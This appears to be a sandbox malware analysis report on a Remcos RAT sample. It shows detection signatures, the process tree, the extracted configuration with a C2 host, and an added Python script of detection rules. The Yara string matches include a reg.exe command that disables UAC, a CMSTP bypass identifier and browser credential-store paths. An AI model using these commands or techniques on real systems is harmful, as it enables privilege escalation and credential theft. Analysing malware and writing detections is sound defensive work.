

Windows Analysis Report
GVV.exe

Overview

General Information

Sample name:GVV.exe
Analysis ID:1435345
MD5:fa3641c75d2beb68c01e8065eefc4707
SHA1:1a2f7c3bb7190f8d8e1685e4e1fd77ebecc699ba
SHA256:e28c8fc4052dbd472cc6245f605064f85ebb36371b43246066fdbeca547cbd17
Tags:exe

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • GVV.exe (PID: 3384 cmdline: "C:\Users\user\Desktop\GVV.exe" MD5: FA3641C75D2BEB68C01E8065EEFC4707)
    • deblaterate.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\GVV.exe" MD5: 67B3857DEE4F4219F088B87902BFF4B0)
      • svchost.exe (PID: 2248 cmdline: "C:\Users\user\Desktop\GVV.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • WerFault.exe (PID: 3544 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 6336 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • deblaterate.exe (PID: 1136 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: 67B3857DEE4F4219F088B87902BFF4B0)
      • svchost.exe (PID: 592 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaa8:$a1: Remcos restarted by watchdog!
  • 0x6b020:$a3: %02i:%02i:%02i:%03i
00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b6c:$str_b2: Executing file:
  • 0x65bec:$str_b3: GetDirectListeningPort
  • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65718:$str_b7: \update.vbs
  • 0x64b94:$str_b9: Downloaded file:
  • 0x64b80:$str_b10: Downloading file:
  • 0x64c24:$str_b12: Failed to upload file:
  • 0x65bb4:$str_b13: StartForward
  • 0x65bd4:$str_b14: StopForward
  • 0x65670:$str_b15: fso.DeleteFile "
  • 0x65604:$str_b16: On Error Resume Next
  • 0x656a0:$str_b17: fso.DeleteFolder "
  • 0x64c14:$str_b18: Uploaded file:
  • 0x64bd4:$str_b19: Unable to delete:
  • 0x65638:$str_b20: while fso.FileExists("
  • 0x650b1:$str_c0: [Firefox StoredLogins not found]
00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6497c:$s1: CoGetObject
  • 0x64990:$s1: CoGetObject
  • 0x649ac:$s1: CoGetObject
  • 0x6e938:$s1: CoGetObject
  • 0x6493c:$s2: Elevation:Administrator!new:
Source | Rule | Description | Author | Strings
4.2.deblaterate.exe.4000000.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
4.2.deblaterate.exe.4000000.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
4.2.deblaterate.exe.4000000.1.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x690a8:$a1: Remcos restarted by watchdog!
  • 0x69620:$a3: %02i:%02i:%02i:%03i
4.2.deblaterate.exe.4000000.1.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6316c:$str_b2: Executing file:
  • 0x641ec:$str_b3: GetDirectListeningPort
  • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d18:$str_b7: \update.vbs
  • 0x63194:$str_b9: Downloaded file:
  • 0x63180:$str_b10: Downloading file:
  • 0x63224:$str_b12: Failed to upload file:
  • 0x641b4:$str_b13: StartForward
  • 0x641d4:$str_b14: StopForward
  • 0x63c70:$str_b15: fso.DeleteFile "
  • 0x63c04:$str_b16: On Error Resume Next
  • 0x63ca0:$str_b17: fso.DeleteFolder "
  • 0x63214:$str_b18: Uploaded file:
  • 0x631d4:$str_b19: Unable to delete:
  • 0x63c38:$str_b20: while fso.FileExists("
  • 0x636b1:$str_c0: [Firefox StoredLogins not found]
4.2.deblaterate.exe.4000000.1.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x62f7c:$s1: CoGetObject
  • 0x62f90:$s1: CoGetObject
  • 0x62fac:$s1: CoGetObject
  • 0x6cf38:$s1: CoGetObject
  • 0x62f3c:$s2: Elevation:Administrator!new:

          System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 6336, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\GVV.exe", CommandLine: "C:\Users\user\Desktop\GVV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GVV.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 5276, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\GVV.exe", ProcessId: 2248, ProcessName: svchost.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 6336, ProcessName: wscript.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\GVV.exe", CommandLine: "C:\Users\user\Desktop\GVV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GVV.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 5276, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\GVV.exe", ProcessId: 2248, ProcessName: svchost.exe

          Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

          Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: FD 44 4B 36 AE 9C E0 16 26 19 F5 A2 D6 C2 5C 1C 3F 2E 1E 22 74 EF 03 FE 4E CA 0A C8 28 C8 02 76 CE D4 34 45 AE BE CC E8 6F 0D CB 89 C3 D6 7F 35 0B 71 0A 11 71 35 61 80 1D 1C F9 6D 0A C2 5C 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2248, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-E70NOS\exepath
          No Snort rule has matched
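The Sigma hits above (script dropped to the Startup folder, wscript.exe launching it, svchost.exe with an uncommon parent) plus the Rmc-E70NOS registry key and the EnableLUA reg.exe string from the Yara matches can be turned into a small host-side triage pass. The following is an added example, not part of this report and not Joe Security's or Sigma's own rule text: the rule logic is a simplified reimplementation of those ideas, the Sysmon-style events are constructed to mirror the process tree above, the wscript.exe parent image and the svchost.exe parent allowlist are assumptions.

```python
"""Triage rules for the behaviours this report attributes to the sample:
a script dropped into the Startup folder (Sysmon EventID 11), wscript.exe
launching it (EventID 1), svchost.exe spawned by a parent other than
services.exe (EventID 1), the EnableLUA-disable command carried in the
Remcos strings, and the Rmc-<id> registry key (EventID 13).
Added example: simplified reimplementation, not the Sigma rules' own text."""
import re

STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumption: a deliberately small allowlist of parents that legitimately
# start svchost.exe; tune it to the host's own baseline.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}
ENABLELUA_OFF = re.compile(r"EnableLUA\b.*?/d\s+0\b", re.I)
REMCOS_KEY = re.compile(r"\\SOFTWARE\\Rmc-[A-Z0-9]+\\", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name component of an image path ('' if missing)."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list:
    """Rules over a process-creation event (EventID 1)."""
    tags = []
    image, parent = image_name(ev["Image"]), image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "svchost.exe" and parent not in SVCHOST_PARENTS:
        tags.append("uncommon_svchost_parent")
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
        tags.append("script_host_exec")
        if STARTUP_DIR.search(cmd):
            tags.append("script_from_startup_folder")
    if ENABLELUA_OFF.search(cmd):
        tags.append("uac_enablelua_disabled")
    return tags


def check_file_create(ev: dict) -> list:
    """Rule over a file-create event (EventID 11)."""
    target = ev["TargetFilename"]
    if STARTUP_DIR.search(target) and SCRIPT_EXT.search(target):
        return ["script_dropped_in_startup"]
    return []


def check_registry(ev: dict) -> list:
    """Rule over a registry value-set event (EventID 13)."""
    return ["remcos_registry_key"] if REMCOS_KEY.search(ev["TargetObject"]) else []


RULES = {1: check_process, 11: check_file_create, 13: check_registry}


def scan(events: list) -> list:
    """Return (ProcessId, tag) pairs for every rule hit, in event order."""
    findings = []
    for ev in events:
        for tag in RULES.get(ev["EventID"], lambda _: [])(ev):
            findings.append((ev["ProcessId"], tag))
    return findings


# Constructed Sysmon-style events mirroring the report's process tree; the
# wscript.exe parent image is an assumption (the report leaves it empty).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 2248, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\silvexes\deblaterate.exe",
     "CommandLine": r'"C:\Users\user\Desktop\GVV.exe"'},
    {"EventID": 1, "ProcessId": 6336, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming'
                    r'\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"'},
    {"EventID": 11, "ProcessId": 5276,
     "Image": r"C:\Users\user\AppData\Local\silvexes\deblaterate.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\deblaterate.vbs"},
    {"EventID": 13, "ProcessId": 2248, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Rmc-E70NOS\exepath"},
    # benign control: a normally parented svchost.exe must not fire
    {"EventID": 1, "ProcessId": 900, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for pid, tag in scan(SAMPLE_EVENTS):
        print(f"PID {pid}: {tag}")
```

The svchost.exe rule is the noisy one: the parent allowlist above is intentionally short, and on a real fleet it should be derived from the host baseline rather than copied. The registry rule keys on the Rmc-<mutex> naming the report shows, so a rebuilt sample with a different mutex needs the pattern adjusted.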


          AV Detection

Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack | Malware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: GVV.exe | ReversingLabs: Detection: 34%
Source: GVV.exe | Virustotal: Detection: 30%
Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Joe Sandbox ML: detected
Source: GVV.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_00433837
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00433837
Source: deblaterate.exe, 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_9a170fd7-7)

          Exploits

Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR

          Privilege Escalation

Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004074FD _wcslen,CoGetObject,5_2_004074FD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004074FD _wcslen,CoGetObject,15_2_004074FD
Source: GVV.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP | source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0017DBBE
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0014C2A2 FindFirstFileExW,0_2_0014C2A2
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001868EE FindFirstFileW,FindClose,0_2_001868EE
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0018698F
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D076
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D3A9
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00189642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00189642
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0018979D
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00189B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00189B2B
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00185C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00185C97
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_004DDBBE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004AC2A2 FindFirstFileExW,4_2_004AC2A2
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E68EE FindFirstFileW,FindClose,4_2_004E68EE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_004E698F
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD076
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD3A9
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E9642
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E979D
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_004E9B2B
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E5C97 FindFirstFileW,FindNextFileW,FindClose,4_2_004E5C97
